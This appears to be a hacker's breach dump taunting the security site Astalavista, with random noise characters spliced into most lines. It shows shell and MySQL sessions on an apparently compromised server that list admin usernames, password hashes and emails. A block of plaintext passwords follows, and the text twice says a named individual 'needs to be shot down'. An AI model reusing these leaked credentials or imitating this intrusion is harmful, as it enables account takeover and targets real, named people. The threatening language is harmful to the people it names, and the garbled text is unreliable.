* P0 P, E4 v8 \; c7 P <title>ASTALAVISTA.com - Exploits</title>
. i0 f. u" t! [" t5 e7 w. ~7 h <link>http://www.astalavista.com/exploits</link># J" h6 U& w4 }0 X6 I$ u- Q
<description>All availably Exploits.</description>! b- a9 X8 L* S) x' t0 o
<language>en-us</language>3 V9 k: x, x1 u" z* ]+ j# k
<lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>0 Y H; A: \( y4 p; F( y
<docs>http://blogs.law.harvard.edu/tech/rss</docs>8 x5 Y( a$ R3 |. ^- q7 o& t
<generator>Astalavista.com</generator>
0 W& y5 |0 T; P$ |: ? <webMaster>info@astalavista.com</webMaster>’ . $items . ‘
! `% |+ L0 w3 ^ </channel>
. G7 `4 t& r$ Y9 {: c9 m6 r% x. b) ?</rss>’;7 `- \) O0 h( r1 M9 \1 J+ e' Q2 M
9 C& j& g' C7 p3 f: x: \% Y if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {4 a8 ~% [+ j" Z+ z/ n% v* ?
unlink (FULLPATH . ‘/feed/exploits.xml’);
" B# V/ S& V1 ~: W }# m$ }5 Y. `& y0 ~1 ~( d
. J- c* ]4 N( L9 V/ p8 |* z, E file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);9 i$ J& c) m2 E7 C
[snip]4 |6 J9 i! W, [- Z& X5 p U, h8 J
0 Z9 P _9 ?( J$ C7 e% O- U
sh-3.2$ cat exploits.sh, i3 {( S- v3 d! y R
#!/bin/sh
. i7 z% q: q/ f( G& A
3 B8 l! D5 f* E" b0 i8 s) R! v###########################################################4 L# C. v- A9 j8 U3 Z8 X* n
# #4 C) H9 l' i) d( K( E
# Title: milw0rm exploits adder #
& t8 D% N, H0 g) y3 K8 ~* n# Description: Add all milw0rm exploits to the #
( R& I$ N/ `1 H# A, {, Q6 e. P# Astalavista.com database #
5 @) J; O* T+ Y6 C2 X) c/ p# #/ P8 x: u$ |2 k- `
# Company: Astalavista Group #
# G4 r7 F2 e" T# Author: Paulo M. Santos #( w! D+ L% g- j/ T. E, \
# E-Mail: 链接标记paulo.santos@astalavista.ch #7 \. s( t" [4 Y. I3 f. q# [
# #
8 }3 |% r7 w1 [1 B###########################################################+ a% B- F% p1 V5 @; Q0 C' ~7 h
* H) n9 N& m6 M* p. e; W
# path/ s7 D8 R) y! S7 H% {
this_path=/home/com/public_html/modifications/cronjobs6 ^0 n: _( l/ _0 k2 F
U2 c9 Z/ K5 k+ W4 F
# change directory8 f% z, g C: Z' A! q7 R3 T
cd $this_path
" ]4 M! _5 U5 P1 o0 `0 M! E/ Y4 Hcd tmp/; X0 f# l4 g t. E0 [$ G0 ~7 h: |2 H
& N/ {0 x C3 X* {4 M+ q" K
# delete files
3 b" q1 q W2 p, rrm -rf milw0rm.tar.* &
5 u& [9 C, g5 P. l( w& Jrm -rf milw0rm/ &
$ h! R$ [( s3 }- e! x4 r. J2 @9 B& f0 o
# wget milw0rm paket
4 V8 f/ x8 k! T0 h" a I) zwget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]) X2 q: p) q9 n
" d$ H) m/ \- ~0 h
# extract milw0rm paket K" G" {4 c+ ?0 k$ w
tar -xvf milw0rm.tar.bz2, z; @( F: R6 s: T1 N# n
) K6 @+ Q/ Z% r
# change owner- K! N- r% P: x. ~/ q, y3 H2 C
chown -R com .+ b( Q, p: R0 G2 x7 m% C3 k/ S
chgrp -R com .( y2 \9 a- S8 Z: [: b
1 u h3 N7 W% S# execute php script
: T4 P9 S% A, q* }; acd $this_path
! y- N" c- `: U* b+ G! O3 h8 ]' tphp -q exploits.php4 ]2 @3 a3 l. b8 v- u0 Z
. ]/ @6 F; I% C. e3 M# delete files! ]1 m/ p. \1 ^0 f3 a
rm -rf tmp/milw0rm.tar.*7 N; Z1 y8 T# ] u4 W# P( y' @
rm -rf tmp/milw0rm// X, n0 j4 g: l$ H" z+ o5 B% t9 x
: D* V& S A. z |
sh-3.2$ echo “Paulo M. Santos needs to be shot down.”
2 q1 w6 ]% l9 \ }( B' a" o4 l% h- FPaulo M. Santos needs to be shot down." l* r9 O# j/ O* E) ~" F. p
1 L- X; }+ g* W
mysql -u contrexxuser2 -p% b3 m( V0 {+ m% I# `
Enter password:# ^9 o. v+ J: d1 j2 f; B
Welcome to the MySQL monitor. Commands end with ; or \g.
8 ~% W |8 v3 g- l2 a( ?, pYour MySQL connection id is 261694
; [- F0 b5 h' Y& v' Q# CServer version: 5.0.45-community-log MySQL Community Edition (GPL), b& z- q- o, Z( K, K1 j9 g3 }
! A+ |0 W0 n' J1 o/ E
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer., U) C9 J6 \& ~& d$ q l
F( E9 @3 i/ f, Q; {; Q
mysql> show databases;( L" v" P1 s7 _; A
+——————–+; \7 [* U0 q+ S& q7 Y* `( |& u, L
| Database |
+ q4 { m7 r1 l+——————–+! G. f3 ]; d3 e
| information_schema |
8 a# V% z- h0 k7 [/ G ^| com_contrexx2 |
$ v8 N; }/ C1 r9 H: E| com_contrexx2_live |/ G ^: Y! I1 s+ ^7 H7 Y3 I
| test |3 Y* E# e. y1 M7 D4 B
+——————–+
$ v! b' A Z2 j7 `. ]4 rows in set (0.00 sec): h/ v6 Y% M& Z8 R/ t) R; }
* D0 ^1 h" v& H$ \) h
mysql> use com_contrexx2_live
6 u# m$ I, V3 A/ p+ Y- }1 o+ T' jDatabase changed
! c( X% ?3 `/ ~. wmysql> show tables;
9 T4 F; c H* V+————————————————–+
$ n7 J2 r) N f" `* E8 p| Tables_in_com_contrexx2_live |
1 ]9 l* N& n9 u% R4 y+————————————————–+2 s Z5 P5 d4 L. v# S+ c$ D
| cc_banner_counter |2 _4 ?8 V8 E4 ~ E0 M5 N
| cc_search_counter |: P, B8 Z5 W9 X/ u& V
| contrexx_access_group_dynamic_ids |
- Z8 Z4 V2 n7 `| contrexx_access_group_static_ids |/ b6 T" z9 J6 x* f, Q8 C3 ?
| contrexx_access_rel_user_group |
0 S' n; `7 V' ]1 g8 y) R' s* j| contrexx_access_settings |
- b$ J2 k7 W) R i" C) P| contrexx_access_user_attribute |
4 b" \/ K4 i% r| contrexx_access_user_attribute_name |
, Z& k$ w+ ^/ U5 J| contrexx_access_user_attribute_value |
: ^+ M: w, {8 ?0 m. H6 W| contrexx_access_user_core_attribute |* V( i" e, ?6 X! @, K
| contrexx_access_user_groups |5 Q5 Z0 y4 A8 g' x! P% I+ F
| contrexx_access_user_mail |! N2 A+ o0 M9 q0 ]
| contrexx_access_user_profile |* O; f6 n: l8 @4 F
| contrexx_access_user_title |
- V& L+ H6 G! g/ a3 b8 T| contrexx_access_user_validity |
; R. N& [6 H5 h9 L6 ?" l| contrexx_access_users |
5 G W8 |1 [8 t3 o) w/ @| contrexx_backend_areas |
. n+ k/ G) Z- @3 t/ }7 c' f2 C| contrexx_backups |, Q5 n. A5 }4 `) ~! Q
| contrexx_content |* o7 T! v' Q3 ]5 L; W% ?% {
| contrexx_content_history |
6 x% _ M9 a+ g, P| contrexx_content_logfile |0 e) I1 D$ @5 Y ~
| contrexx_content_navigation |
5 E: a8 R, [: t g( ?/ e3 A: |3 f2 A* w| contrexx_content_navigation_history |
; f: Z! ?/ c' H) D/ C5 z9 @- P2 T| contrexx_ids |, o( {6 I ?. f* C q
| contrexx_languages |
" G7 _4 K" h5 h; _3 ~5 L3 I6 T| contrexx_lib_country |$ e+ Y8 Y. J7 @. V: L% }- H
| contrexx_log |' `4 ], D2 f8 C$ `# e' O4 y
| contrexx_module_alias_source |1 p; B- _) k# l: R* l* p) o8 R' Q
| contrexx_module_alias_target |- ]/ {1 ]; H: V" Z: d/ g# D$ f3 X9 V
| contrexx_module_block_blocks |1 r0 S* q0 q5 d9 q: }
| contrexx_module_block_rel_lang |
. B+ r& w7 u4 ]: D4 z0 b6 z5 I| contrexx_module_block_rel_pages |1 l2 ?% m) u* E9 a4 }4 [6 {! |
| contrexx_module_block_settings |" }1 p- ], v: q1 S
| contrexx_module_blog_categories |( E, ?3 S6 f o7 [% I8 X+ A
| contrexx_module_blog_comments |
9 M' t. t U4 m+ A- b. D" X| contrexx_module_blog_message_to_category |
( H% ?+ f" z6 c& T; s, `% p0 x| contrexx_module_blog_messages |$ l1 N6 E1 ~# ^1 a) W" a" Q
| contrexx_module_blog_messages_lang |
, g; z# \2 W8 G- f. t [+ v, ^' h| contrexx_module_blog_networks |
' k( k% V5 }, M7 f' r `| contrexx_module_blog_networks_lang |+ }3 v7 e0 ]" u& D
| contrexx_module_blog_settings |
' \% V( k! d X- G" X| contrexx_module_blog_votes |
2 N8 q" \. F9 ~% Z0 V: {) P| contrexx_module_calendar |, z1 |4 E0 f) a7 `7 x! r5 |5 S
| contrexx_module_calendar_access |
) M& F0 M. s m/ z% M8 K* o) e| contrexx_module_calendar_categories |
5 d* s' P- y9 [' \' R' m' O5 R5 R| contrexx_module_calendar_form_data |
4 ?2 F: U- N8 R4 q| contrexx_module_calendar_form_fields |
; Y& Q0 m4 r: G6 A! K| contrexx_module_calendar_registrations |, l) A' Z7 D7 G' ~" y
| contrexx_module_calendar_settings |
* X. v4 }+ r) ^0 X% K| contrexx_module_calendar_style |$ m' K! S! e1 @% J# ]. q( h$ W, J
| contrexx_module_contact_form |
; @) \% h) H$ k* j- w3 [| contrexx_module_contact_form_data |7 G! M- K" ^$ f$ r" C2 t
| contrexx_module_contact_form_field |
" @* W, R2 r8 }- V2 {$ @| contrexx_module_contact_settings |7 T" t- O( e9 e; i$ W3 v9 K
| contrexx_module_data_categories |
) o y6 G# \4 N$ e| contrexx_module_data_message_to_category |
9 b( c' H0 g' w& d| contrexx_module_data_messages |- j g. W) ` K7 D1 v7 O
| contrexx_module_data_messages_lang |3 _& P7 f8 r- u: @6 Z# |
| contrexx_module_data_placeholders |8 `9 \* _* U% a% r
| contrexx_module_data_settings |
) ~ I7 J. x& C; \1 m9 A% R| contrexx_module_directory_access |
0 n i" u1 P$ Q9 @6 r5 S4 D| contrexx_module_directory_categories |
4 B' g( X6 H! W1 Y! n+ H: B" S8 s, C| contrexx_module_directory_dir |9 |3 J" J) v# Y/ |" i
| contrexx_module_directory_inputfields |8 y5 x* j. `2 I+ b2 n# O& `
| contrexx_module_directory_levels |
( ` P2 V, R4 e+ u" p| contrexx_module_directory_mail |
9 g4 ]* U0 M2 X8 i| contrexx_module_directory_rel_dir_cat |
, x# G2 d3 `+ D' S( |, w2 @| contrexx_module_directory_rel_dir_level |$ u: V, S0 }5 R8 e; X8 I- I/ ^
| contrexx_module_directory_settings |, c/ l( J; Z1 A% v# T
| contrexx_module_directory_settings_google |
* M3 [, q3 a' X4 h+ q| contrexx_module_directory_vote |
0 g' T2 h7 K( Z8 @$ }| contrexx_module_docsys |6 x; U% \. f7 \6 }
| contrexx_module_docsys_categories |
, h# N$ o- y/ T| contrexx_module_egov_configuration |
" I Z8 |" m( z+ O$ E9 J| contrexx_module_egov_orders |
) r. h6 V* R$ m0 o) O" k| contrexx_module_egov_product_calendar |
! s9 Q* C8 @5 {+ _/ M4 E8 f| contrexx_module_egov_product_fields |
! M( v! u" `$ R4 `$ k1 y0 E| contrexx_module_egov_products |' `8 M2 u5 y& h1 x7 V! @) l: w6 h
| contrexx_module_egov_settings |8 R0 K% B# Z' ^) Y
| contrexx_module_exploits |
4 o: m J0 d. B| contrexx_module_exploits_categories |
, N W& f3 ^+ c/ ~/ ]$ t| contrexx_module_feed_category |# J: }% F8 c H2 x; ` n/ a4 c8 m
| contrexx_module_feed_news |
. j/ J* S9 `. b4 \1 G0 G| contrexx_module_feed_newsml_association |7 T' B! w( R: r7 P3 R
| contrexx_module_feed_newsml_categories |- w& `' s4 r+ G
| contrexx_module_feed_newsml_documents |; s! s( w/ {$ J8 y' ?% N' D8 G9 V7 x
| contrexx_module_feed_newsml_providers |3 l' C6 w/ T6 z* w2 X: T/ q/ ?- H
| contrexx_module_forum_access |
( {; i: e( a9 W| contrexx_module_forum_categories |5 ^9 G3 l$ u1 s& w! X
| contrexx_module_forum_categories_lang |
1 s6 x/ ]4 N3 O+ i- c| contrexx_module_forum_notification |2 p6 }$ q: o; K2 S
| contrexx_module_forum_postings |% j4 i3 K7 X: Q- k2 H# ^7 q$ r0 p
| contrexx_module_forum_rating |3 K5 L, Y3 P7 Q0 d: ]& {
| contrexx_module_forum_settings |
3 M7 O; G( _9 c+ x: g | I# D* i( K: I| contrexx_module_forum_statistics |& x* }1 g% Z) r8 ~
| contrexx_module_gallery_categories |2 V% ]8 q" `: Q1 V
| contrexx_module_gallery_comments |
0 l. Y' X4 K& O6 x' m9 e6 P0 N+ d| contrexx_module_gallery_language |
3 g# `8 _. z0 A+ S: U0 k* S" U! H8 v| contrexx_module_gallery_language_pics |
& v* Y: v$ q! u| contrexx_module_gallery_pictures |; A1 N9 U1 d! O" |
| contrexx_module_gallery_settings |
% V+ N2 w6 A: [' }4 P| contrexx_module_gallery_votes |
# f* j8 J$ R$ l3 L| contrexx_module_guestbook |) L# L' F; h* _" M* z) {6 p- {) F. W
| contrexx_module_guestbook_settings |& C. y, E G: j
| contrexx_module_livecam |
6 B: w a) ^* W# _| contrexx_module_livecam_settings |
4 y; K1 f& m4 k9 x2 R| contrexx_module_market |
4 j2 {0 }1 m H3 p| contrexx_module_market_access |
: i6 Q) h% V% | q% V| contrexx_module_market_categories |
# Y! e9 j) `8 e7 S. ]& ^| contrexx_module_market_mail |: [0 W- V( P7 q
| contrexx_module_market_paypal |
- J. d( |. d3 i0 W6 S6 C! z| contrexx_module_market_settings |) h! _" Z/ I/ Q+ d
| contrexx_module_market_spez_fields |
7 e- E8 [- b9 _| contrexx_module_mediadir_access |- |* H- f- a0 J. @: b+ N
| contrexx_module_mediadir_categories |6 Y: Y4 w+ H& M% e2 J' l
| contrexx_module_mediadir_comments |. _/ n0 b* w/ `; I3 j, s
| contrexx_module_mediadir_dir |
4 \: G* |, R& H| contrexx_module_mediadir_inputfields |
2 A4 D0 E5 f+ | k2 |. _| contrexx_module_mediadir_levels |1 x+ G2 b: o6 i4 R9 p4 \
| contrexx_module_mediadir_mail |
4 }" v8 i1 I) ?! n4 u| contrexx_module_mediadir_rel_dir_cat |: ]1 R5 \8 {: H$ | q$ r/ X
| contrexx_module_mediadir_rel_dir_level |
, Z1 R0 i6 N6 U& Y* n| contrexx_module_mediadir_reports |
D5 x+ ^" I9 _' F. n& q| contrexx_module_mediadir_settings |
8 O+ } o6 U p: g* ]8 j" U# g, j7 D| contrexx_module_mediadir_settings_google |2 c' X8 F% B4 N; A( p
| contrexx_module_mediadir_vote |8 g; d+ x" L+ V: `/ e2 _
| contrexx_module_memberdir_directories |
; f: i7 Q% |; k; H7 B, ?9 b( o" ^) Z| contrexx_module_memberdir_name |3 ~5 a: g' t; p( a7 H
| contrexx_module_memberdir_settings |
! M- ~# h/ ^8 p1 Q: O| contrexx_module_memberdir_values |3 A2 d. L: ?9 U4 z8 g" n) }8 {
| contrexx_module_nettools_allowed_groups |
, q x u& a3 w8 C| contrexx_module_nettools_settings |
1 ^5 a( J5 \& e0 J2 A7 e| contrexx_module_news |
& }& L( a, r, m% @( L, i| contrexx_module_news_access |# Q( }5 f( V7 T# s6 D2 u
| contrexx_module_news_categories |
2 D. t5 }# I# v- c' _6 v| contrexx_module_news_settings |, k6 \ W6 V1 Y3 l" X
| contrexx_module_news_teaser_frame |. m/ |+ Y# l4 q: U; l
| contrexx_module_news_teaser_frame_templates |
" g1 E- L( {: H* A5 Y+ ~9 A| contrexx_module_news_ticker |
( N3 T7 S0 \* W, I* K6 C! J| contrexx_module_newsletter |0 L/ c8 ?6 q. Q
| contrexx_module_newsletter_attachment |
2 U+ B8 ~4 N- G# [! S| contrexx_module_newsletter_category | Y' {7 k* Q1 S f
| contrexx_module_newsletter_confirm_mail |
! i' B$ E5 M2 f3 R. s0 B| contrexx_module_newsletter_rel_cat_news |# S) \- J+ p! l, P$ a3 Z
| contrexx_module_newsletter_rel_user_cat |7 r5 l9 b$ j$ V: O# k
| contrexx_module_newsletter_settings |+ B# J" x/ v8 d3 ^
| contrexx_module_newsletter_template |' g! {# m8 V/ q- r4 _
| contrexx_module_newsletter_tmp_sending |
/ F+ v: T" {! j/ H/ R| contrexx_module_newsletter_user |8 C5 U D2 \: d, o- [9 X: J6 x
| contrexx_module_newsletter_user_title |& X. w+ l* C+ {
| contrexx_module_onlinetools_defaultports |
0 u. h1 E; Z. r/ [. L| contrexx_module_onlinetools_defaultports_back |: ]' s. a6 E6 k
| contrexx_module_onlinetools_geolitecity_blocks |9 {# i1 G4 o2 j2 u* k/ r
| contrexx_module_onlinetools_geolitecity_country |, Z9 {) v6 z8 H6 Q( U' K
| contrexx_module_onlinetools_geolitecity_location |
4 O3 x0 r! j* L| contrexx_module_podcast_category |
, }( ^3 J% j; E: || contrexx_module_podcast_medium |! X$ c. e2 q5 D- l# Q
| contrexx_module_podcast_rel_category_lang |5 V7 o( \2 \3 ?9 N5 b
| contrexx_module_podcast_rel_medium_category |
4 x7 I8 N' w1 K0 P) \' m' i9 Y| contrexx_module_podcast_settings |9 h7 G& n, L4 A; E, R+ ]
| contrexx_module_podcast_template |
5 {) ^. C; ~: ?5 T- x& f/ @2 E/ i- T/ D| contrexx_module_proxydb |& l/ x0 B8 x$ Q) {
| contrexx_module_recommend |
$ Q$ a( J, n7 r1 f- p| contrexx_module_repository |
) u* }5 \' l" T& Z, T+ U| contrexx_module_securitynews_cats |/ G8 ]+ r8 f% O7 ~
| contrexx_module_securitynews_feeds |
, i7 [) j1 z/ M- {+ y, E| contrexx_module_securitynews_news |
* ?5 w- j( O# \: z1 I5 ~! h3 C| contrexx_module_shop_categories |) @1 Y% V: o& O# n
| contrexx_module_shop_config |
0 e1 L+ A" _, Z" J/ @/ g| contrexx_module_shop_countries |
1 l. r `0 S" S/ p; w: ]2 k| contrexx_module_shop_currencies |
/ O, l3 t/ B2 I& S$ L2 x' m| contrexx_module_shop_customers |8 w6 a" a% O# | A& ]) }3 t2 m* H
| contrexx_module_shop_importimg |
2 }; j. n# j$ T| contrexx_module_shop_lsv |
; d5 e O" j9 B% I$ c+ t| contrexx_module_shop_mail |) `; @ G/ L4 K0 ^# D" K2 X
| contrexx_module_shop_mail_content |, N8 G' A1 ` l3 c
| contrexx_module_shop_manufacturer |: F4 ~; P2 _% w9 o' M7 f r
| contrexx_module_shop_order_items |
1 l5 W% `* |8 l6 q3 v| contrexx_module_shop_order_items_attributes |4 Y& ]) V/ m! u% L+ J
| contrexx_module_shop_orders |( c6 ^# F% r8 ?% P* G; V* N
| contrexx_module_shop_payment |
! L3 J7 m# x0 w' P2 o; Y| contrexx_module_shop_payment_processors |
# @0 b8 G0 F( ^# t| contrexx_module_shop_pricelists |; q) f4 R) Q7 S- Y# P8 K. w. [, x
| contrexx_module_shop_products |4 h. I* Z; ^4 |( C% e
| contrexx_module_shop_products_attributes |; P. U' l( Z* a3 V; l
| contrexx_module_shop_products_attributes_name |
3 z2 _: S0 h: w1 n| contrexx_module_shop_products_attributes_value |+ u! A1 q, s( l4 b& _* G9 a
| contrexx_module_shop_products_downloads |
; s- f% Y6 z! R T) e| contrexx_module_shop_rel_countries |
: D) k% E# r Y2 R# {' m! Q7 Q| contrexx_module_shop_rel_payment |
" |, I( y' L" H# [5 R| contrexx_module_shop_rel_shipment |2 p* W* }# t- h. o! k: R/ ?
| contrexx_module_shop_shipment_cost |$ k R, h" W; |6 a6 T9 L$ V
| contrexx_module_shop_shipper |
/ Z; h' c1 Z3 e7 w& B| contrexx_module_shop_vat |6 D/ ^7 }, g" g5 b- u
| contrexx_module_shop_zones |
& i7 N/ r. u0 [, \" z| contrexx_module_u2u_address_list |
2 Q. Y9 d& b2 _ O| contrexx_module_u2u_message_log |
) R: m7 _8 \# \7 ?/ v6 U: ~' B| contrexx_module_u2u_sent_messages |, x% o- U Q0 j7 T" w6 \
| contrexx_module_u2u_settings |
: c' H! |, T: [) ~% h| contrexx_module_u2u_user_log |- Q4 V6 c" B2 u r8 F [0 l
| contrexx_modules |
6 r1 A- v; {7 [7 {| contrexx_sessions |: T$ U7 f C: t- b8 B* A! Y9 @/ I
| contrexx_settings |- @$ X P2 Z& i& f4 V
| contrexx_settings_smtp |
& @9 D- c* K# K) B9 W| contrexx_skins |- J# Z% V3 c8 r9 g- T$ N! M: A1 x
| contrexx_stats_browser |
5 B. g; e ^! C' s: u| contrexx_stats_colourdepth |: F) _+ D. ^! E# d. e7 l
| contrexx_stats_config |, L) _1 z5 A9 ^6 v) h& _2 l \- M
| contrexx_stats_country |
2 Z8 ~) J8 G& ^| contrexx_stats_hostname |
4 D# _( F. ^; E8 [| contrexx_stats_javascript |
. y P0 p; r# V7 O| contrexx_stats_operatingsystem |9 {. ?& \( ?" l
| contrexx_stats_referer |% l/ A; i1 y) o' Q4 O
| contrexx_stats_requests |( ]& O" y5 H2 H
| contrexx_stats_requests_summary |
5 V5 i) v' v+ Z3 w) g| contrexx_stats_screenresolution |, k* H0 @' L c; [( K O
| contrexx_stats_search |- V. L- h3 g1 u$ v ]
| contrexx_stats_spiders |6 r9 v# r2 I: k. J
| contrexx_stats_spiders_summary |8 S- b! ]2 B. ^& T$ v
| contrexx_stats_visitors |
8 y2 |; @0 s& F! W& J| contrexx_stats_visitors_summary |' |& T5 n( _4 n, n. B( v- Y, a
| contrexx_voting_additionaldata |
8 h# i5 I: t- V9 P, Q* ^| contrexx_voting_email |
3 U, |; N; x( i; p( `/ n3 K| contrexx_voting_rel_email_system |# l" _9 f- z$ W+ c- C; Z4 l* w* C
| contrexx_voting_results |1 D/ j/ x, j- F4 Y
| contrexx_voting_system |
# x$ C8 T, B) [) l F* w| foo |* p d! A7 g5 \% y$ f( X& H" C! Y
+————————————————–+
0 @- s, J, D- g& n5 q227 rows in set (0.01 sec)
" [: A0 f; e& j
! G# K+ \6 W) Q7 X' o# I# lmysql> select count(*) as skids from contrexx_access_users;
% x, O& F Q" ~! t; W+ Y+——-+1 [& C3 a$ g3 j- L/ D p6 N
| skids |- u6 d9 ^4 c' U; m9 O6 i
+——-+0 L% k9 g7 A. ~3 E
| 53699 |
7 f n, t f8 d9 k2 r" C1 t+——-+
4 `9 S& f- A4 M4 b1 row in set (0.00 sec)
. }2 t! _1 Z$ n5 I d2 |
/ v+ y! U9 i" y Lmysql> describe contrexx_access_users;: \, m5 P" B: }, R9 _* Y
+——————+——————————————+——+—–+————–+—————-+5 ~3 L1 W0 b S0 x
| Field | Type | Null | Key | Default | Extra |
8 z/ W/ D/ R5 v+——————+——————————————+——+—–+————–+—————-+5 K8 Z* @% ?5 Y- H: ?
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |3 T* G$ d: h$ `) @! d/ _4 C
| is_admin | tinyint(1) unsigned | NO | | 0 | |
" [7 |$ u& O; \4 ]| username | varchar(40) | YES | MUL | NULL | |* [7 V% ^2 ~+ Y- C0 L
| password | varchar(32) | YES | | NULL | |
5 _) Z3 ~$ n: F5 }% v$ m* `| regdate | int(14) unsigned | NO | | 0 | |' j7 \1 O" y4 ]& X5 L& n# U
| expiration | int(14) unsigned | NO | | 0 | |
1 E( v) h+ u0 s/ k$ C| validity | int(10) unsigned | NO | | 0 | |+ r5 E9 W2 q/ J+ S" `
| last_auth | int(14) unsigned | NO | | 0 | |! v9 e/ x `' N5 j! A4 p# y# k8 k
| last_activity | int(14) unsigned | NO | | 0 | |' f+ }* T/ J+ y5 a% d5 F
| email | varchar(255) | YES | | NULL | |
; t% [6 i3 R; V1 _( N' I; y| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |
5 ?: r$ u$ L6 d/ |5 Y. e6 }| frontend_lang_id | int(2) unsigned | NO | | 0 | |
2 Q. N9 J$ G1 O# g# a- i" i| backend_lang_id | int(2) unsigned | NO | | 0 | |3 @2 m) O0 \" S4 c5 _
| active | tinyint(1) | NO | | 0 | |
9 t$ t. z1 j& s/ O| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |
, S3 f$ e. S6 }/ o) [' }$ e| restore_key | varchar(32) | NO | | | |, v8 Z' p% u- y4 H. T- f* m! e# a
| restore_key_time | int(14) unsigned | NO | | 0 | |
" }: b$ r- ~; H7 l/ ]| u2u_active | enum(’0′,’1′) | NO | | 1 | |& U6 d) f1 B1 z; ?( N/ V
+——————+——————————————+——+—–+————–+—————-+. k' h) U. ]3 _& E$ H2 Y! a/ @; N
18 rows in set (0.00 sec)4 A& H3 V; {; w* N" d
9 f2 e o2 @2 G8 u. v2 w
mysql> select username,password,email from contrexx_access_users where is_admin = 1;7 v `2 U& h8 [
+————+———————————-+—————————–+. W# y" G6 n: n
| username | password | email |
& z+ }- j! c' X" D; ]9 w7 F+————+———————————-+—————————–+& t+ I& u. x; ~) ^, b5 o
| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |8 s' U. w2 q5 F# R' V) s; e
| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |9 p* M! c- T v* u$ p/ ?
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |( J8 @0 J* r3 c7 W+ B! `" i1 g
| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |& _- U0 v# U# s, C% A. f) j; @
+————+———————————-+—————————–+
$ n+ m1 K8 \! W7 g+ W; \4 rows in set (0.04 sec)& E6 i- \$ Y: p
_4 R' O# x* Q' n' d
mysql> exit;# B' A/ ]/ ~$ ?( v6 |3 P
Bye
3 ~& F6 _) c- D+ b4 e" K6 d9 R6 B. B% N1 K
[~] There you go, your “team of security and IT professionals” is a joke.
" N% a# O( r+ y7 w; y' k% Y+ X3 ]
$ n8 S$ \' Z% a4 t4 X/ z# {+——————————+- q5 S, }+ K* ~, z" \
system:f82BN3+_*
, L. \5 \4 r4 f" h; x" k. lBe1er0ph0r:belerophor4astacom
" G7 J8 Q' C8 y; B5 z5 E9 ], q% sprozac:asta4cms!# c: s9 c' A2 V9 [" T
commander:mpbdaagf6m
' ~# P% D- P# B1 S1 q. u& F: _sykadul:ak29eral- F0 k% R, X/ M6 w9 B+ r5 m" R
+——————————+
8 Z% ~% u4 U$ F5 [# T S' v# P: q4 F* A1 o. A$ ^
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
8 r3 T+ S1 V! ~- j…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.
2 G: j: m, E% ^: E. [$ L% \/ v. a( ]6 k, J3 X `+ n
[~] Lets move to astalavista.net now,
G ^* \& c, R& E: f
' j- {' ~# q& [; O( iFrom <链接标记[url]https://www.astalavista.net/[/url]>:( [! f* V$ U" o: \
>> Everyone knows that the best defense is a good offense.
1 P0 \( s! y5 M8 V+ o% D; ~; |! q>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
* a% d3 a0 I$ l* w>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.2 z# b# F; O/ B: F
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”2 i1 r5 B) S _: A$ d5 F; y
; v, ]. ]2 K1 K: |
>> Go ahead, try and hack our server . in a completely legal way!9 Z9 i4 q/ y2 L6 `- M u6 s
>> Learn by doing: We offer our members tricky tasks and challenges on an2 N$ f+ e/ ~$ } A1 u2 S
>> ongoing basis so you can test your knowledge and abilities. You can also$ e+ H6 R9 w! C6 K5 v( \- \8 k h! ?+ V
>> demonstrate what you.ve mastered by taking part in regular hacker contests, Q4 t6 ^9 Q; B* {: `! D
>> and war games
. N8 n! n, C+ a: S& ?: F& L' M j; q" s6 N/ @5 n
[~] Lets take a look there, after all… they are hack-proof, aren’t they?!$ x) a, v4 i7 p4 D1 P& N+ X( y! C
! |4 b; Z- @- o1 J9 n[-] Tricky task: Find home dir of astalavista.net
0 a; w, g( C. ?3 I; s7 @. q# ^- U( B2 m: f- J9 Z2 W1 d+ }- z* A
sh-3.2$ ls -la ~astanet% d$ d( ~% D5 K' c- m) f- ~$ Z
total 489 _1 V" W! ]7 B; K+ b
drwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .
& A9 ]6 Q( C* {6 Jdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
4 e1 x5 Q! C# F+ vdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
' V5 u2 N; B$ D5 s-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history6 H- X% O, p4 O0 E
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
- \+ R- _9 v9 o" \0 x! f% d-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile i2 ?- I3 w# w; P' @5 d6 y
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
9 ~0 I/ d/ I& j9 K6 G% ~$ n9 Kdrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
2 _4 u" [+ A) l4 ?6 K: Q3 Pdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
" y/ Y4 l6 |$ m# \$ ?drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail' X, T+ B' N; p0 _* z
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
" t0 S% x( u- E2 ?-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow5 e4 p' S3 ^1 @. K3 t# N
1 S; g3 L+ P; r0 F8 q; _! i
sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/+ b% P6 g L0 {. ~* S5 L" o* A
sh-3.2$ ls -la
